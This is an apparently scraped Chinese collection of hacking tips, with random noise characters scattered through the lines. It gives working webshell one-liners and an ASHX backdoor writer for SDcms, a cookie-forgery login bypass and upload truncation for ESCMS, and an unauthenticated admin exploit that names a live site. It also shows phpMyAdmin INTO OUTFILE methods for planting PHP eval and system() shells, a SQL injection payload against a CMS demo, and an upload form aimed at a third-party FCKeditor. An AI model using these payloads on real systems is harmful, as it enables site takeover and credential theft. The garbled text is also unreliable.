<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
# h1 R& `- z$ Q! KUpload a new file:<br>
- H P+ m0 T" P9 e<input type="file" name="NewFile" size="50"><br>5 x: P0 m- }6 E( x$ K
<input id="btnUpload" type="submit" value="Upload">4 _7 r! t3 T: l9 |: I: f$ Q
</form>/ Y9 C$ t7 j# M3 E, }( c
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 b% H/ i8 m4 T, \% @; V7 Q. d
4 N% ~2 Y- `( c( U* Y
SDcms 后台拿webshell
, P% Y# E, `( d7 n# l9 A0 ]5 I) D2 j
第一种方法:+ K1 [7 ]/ {1 f$ G1 Q! c% e' k
进入后台-->系统管理-->系统设置-->系统设置->网站名称;7 V- [4 |' \* n4 Q- l
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
! \- a9 n4 ~3 I用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。/ S, E/ v$ B2 z" e6 \
第二种方法:) S2 H1 r5 X5 \
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
8 [" l7 z/ t+ b# t k! \1 p) ~2 w) m在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!2 [9 U% o6 ]; R- f5 K- M
第三种方法:
+ h* f, ^ g: r' z/ e/ L进入后台-->界面管理-->模板文件管理-->创建文件" M/ q$ o9 G# D$ P9 c- K
文件名写入getshell.ashx6 U' H5 g7 t1 n
内容写入下面内容:
' b" H" g* ]5 F. r) O ^% N0 S- B; M/====================复制下面的=========================/% m% _% I" p. U
<%@ WebHandler Language="C#" Class="Handler" %>
1 j& `+ ?. R8 Susing System;5 Z8 i3 U0 z2 Q8 B) C8 V, T
using System.Web;
4 j9 P7 O" W2 Z& ]' lusing System.IO;* A0 }: c2 [& y5 D% g
public class Handler : IHttpHandler {; }$ A% _4 `$ Z) Y
public void ProcessRequest (HttpContext context) {* N+ `1 j4 J* R2 Z/ w
context.Response.ContentType = "text/plain";
- l% U2 X) s: GStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
5 e- g+ ~, y6 ~9 x3 ~# g+ ffile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");: j# K' D7 z" @' O/ O5 k' a
file1.Flush(); A& [( l- X8 O. S$ i7 J$ p
file1.Close(); `% r# C+ q- M' f; o
}3 \4 D: Z6 L& I
public bool IsReusable {3 w0 s' A9 D, ^: O+ ^, c" w
get {
2 e6 y8 b* S% ~7 z. _5 Preturn false;
* G' G. G# l9 ?1 G0 F}
/ }/ t. C5 v9 b}1 |' y- j! k T/ E# R( l* S# {9 j
}( e! t5 ^$ U& v/ J0 `, I
/=============================================/
- u8 @+ M& y6 K访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
. Z9 Q0 N" z4 H1 x! L# e会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接$ ]# }8 E6 S8 e" A; q' j
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; [# P: S! P% j+ P" ]( f" P0 e' {1 J i; \5 S6 a
ESCMS网站管理系统0day
. P; i3 ?! d) j! g, h1 q3 W* O$ |7 T3 s! |! y# k+ x
后台登陆验证是通过admin/check.asp实现的 Z. A% l) \9 k# r' w
( q8 @( [5 O+ X+ C1 [首先我们打开http://target.com/admin/es_index.html. R1 w. H% g$ n+ s9 z
然后在COOKIE结尾加上
" N& R {* g7 c7 D1 ~1 E1 p; ESCMS$_SP2=ES_admin=st0p;
. E( ?7 _1 B, L% |修改,然后刷新
. ~- Q( t0 A q7 v进后台了嘎..
' ~2 w6 m$ X/ d然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL8 Y7 Y$ p, N0 o2 a8 v* P, v& d
; h7 T! ]8 n$ C- r8 l3 z
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
* R" r: N+ M% b) M( U" F嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
- V9 z! t3 `' j9 W% q4 H8 [7 r" w! i存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
' O" @5 w5 ^2 y* C o在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
* |9 N3 w2 S" G9 w9 D2 f: b8 I1 ?% [------------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ e7 _9 b+ `) Z6 o& s: B
& O! @ H; N6 w8 Z+ M8 V0 z+ Y
宁志网站管理系统后台无验证漏洞及修复' z ~8 A r! u: p( l; R
9 o# {2 b+ k" t网上搜了一下,好像没有发布.如有雷同纯粹巧合!
% b1 A) Y8 z% |4 M官方网站:www.ningzhi.net0 o' i$ m( `, ]
学校网站管理系统 V.2011版本 ; A' m1 O: ~; m5 j! t# C
http://down.chinaz.com/soft/29943.htm ; H& M8 b: O, A4 N1 u4 I3 {
其它版本(如:政府版等),自行下载.
1 O) `1 B5 E; {0 v漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
1 U+ k0 ?1 C vlogin.asp代码如下:
+ g9 p5 V; G( Y2 S<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 1 f; `1 T& C" g0 A' E
manage.asp代码我就不帖出来了.反正也没验证.4 Z; K8 |' C# F
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!9 ?$ t/ I# |4 @
漏洞利用:
2 b: |$ Y, O! t直接访问http://www.0855.tv/admin/manage.asp5 Y# \( ~8 H8 C" ~! v9 F0 h2 T
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5: J& b% ?4 ^* f5 C+ O
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
}: a0 {; {3 \- a) V* j1 w( K( d4 P
phpmyadmin拿shell的四种方法总结及修复
( T" ]: z. u$ ~( \ i/ Q/ S- y
& y5 k- Q; h/ t6 k5 G方法一:, V n0 i) d! e4 h' a
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );5 B. a( W, s, I# |' I" Z( T
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
t7 n, X# T& |" j' w$ MSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
0 i6 t6 m" D3 s6 P' R1 e8 p----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
* T' b0 |7 `( m2 I2 n* {4 L } A 一句话连接密码:7on
7 Z! u3 ^5 ?5 q W方法二:1 |' F. o' q9 P: p: W
读取文件内容: select load_file('E:/xamp/www/s.php');
, X0 r7 e( u" B% |0 E/ w2 m写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'2 r2 \8 ^1 I X
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
5 }& ^+ P% r% s4 y. Y1 x方法三:
' N8 u# M" R- }: ?JhackJ版本 PHPmyadmin拿shell# y% {3 k Y/ b( v0 |2 e
Create TABLE study (cmd text NOT NULL);+ i/ f% x2 Y) h
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
) ^" z/ j7 R0 b" R4 M3 v0 f6 jselect cmd from study into outfile 'E:/wamp/www/7.php';/ t! o* O( a" J( `! Z/ _, l2 j, {
Drop TABLE IF EXISTS study;3 R: _9 S) q9 s7 p3 e
<?php eval($_POST[cmd])?>
$ t% ^! j: t6 g i0 LCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
# ? h7 G: U6 C# j6 h' fINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1: Y8 a3 D3 K+ \+ R
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1. r' x8 ~ U9 j4 S
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。( O; }* i4 T7 }; W8 L1 } l
方法四:
; `) J- |$ X0 P! v/ yselect load_file('E:/xamp/www/study.php');
& C8 W' ?1 F5 Sselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php' v/ ?3 P! p0 X) n% B
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir. Q" c) D) w# j$ M$ D, H
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------9 g: ]0 D v/ V4 v T7 f" x/ l
8 g) [# k5 V( v* F' |+ O \NO.001中学网站管理系统 Build 110628 注入漏洞
: x" m8 ]% w% C/ b5 L5 P6 n' K( A; O3 \3 U
NO.001中学网站管理系统功能模块:9 n+ W: I) Z4 U; V
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
) {3 |1 P3 b) G' T1 R- u: ^2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
; u$ C3 c8 U# q7 Q) ]3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
" `9 W# W( I5 y$ y8 ~ _) u4.视频图片管理:一级分类,动态添加视频或者图片等信息& W: K) W# L* i$ A% Y3 |
5.留言管理:对留言,修改,删除、回复等管理
* C9 F6 W7 E: k6.校友频道:包括校友资料excel导出、管理等功能
$ p; h8 F0 P6 x7 ~7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页( c( o& V4 Y L2 [# {9 C2 \
默认后台:admin/login.asp
+ R+ A( q7 d9 c) X7 ~9 B( Y官方演示:http://demo.001cms.net
$ n1 ~6 l3 A. b3 d8 s2 `& t1 Z源码下载地址:http://down.chinaz.com/soft/30187.htm
+ d/ q" M; a0 `- ?! F2 p2 |EXP:
0 w! b! Z' k8 B; Tunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin9 y# Q0 H; V+ Q1 i" {; ^3 f1 Y
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
' Y7 A. j' R2 I' p) t0 l# lgetshell:后台有备份,你懂的
- d' K; j% p' W另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。 g2 b. D; ]1 x4 N$ Q
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |